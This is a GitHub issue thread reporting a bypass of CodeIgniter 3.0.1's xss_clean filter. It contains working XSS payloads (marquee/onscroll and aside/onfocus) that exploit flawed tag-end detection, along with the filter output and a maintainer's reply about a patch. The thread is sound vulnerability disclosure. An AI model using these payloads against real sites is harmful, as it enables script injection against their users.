### ISSUE TITLE
xss_clean-filter bypass using new lines and attribute confusion

### ISSUE THREAD

**Issue by fransr** [bcit-ci/CodeIgniter#4106]
Hi,
I found a way to confuse the `xss_clean` function inside the Security Helper into allowing arbitrary attributes since the function believes the event-attribute is outside the attribute/tag thus not replacing it with `[removed]`. I'm using CodeIgniter 3.0.1. 

Here's an example:
```
<?=xss_clean('<marquee x="
>"onscroll=alert(1)>')?>
```
This will result in the following output:
```
<marquee x="
>"onscroll=alert&#40;1&#41;>
```
This one will work in Webkit/Firefox, since Blink(Chrome) uses it's own marquee-handler which has deprecated the `onscroll` attribute. However, by using another method you can also trigger it without interaction in Webkit/Blink:
```
<?=xss_clean('<aside tabindex=0 id=x x="
>"onfocus=alert(1)>')?>
```
This will result in the following output:
```
<aside tabindex=0 id=x x="
>"onfocus=alert&#40;1&#41;>
```
(By visiting the URL with this payload, appending #x to the URL-fragment, the element will focus automatically and trigger the onfocus-event, ie: example.html#x )

Regards,
Frans Rosén
www.detectify.com

**Comment by narfbg** [comment]
The newline and all whitespace characters are irrelevant here; the flaw is in the tag ending detection.

Patch referenced above and I will schedule a security release soon. However, please don't post vulnerabilities in public next time ... our security@ contact is in the README.md file.
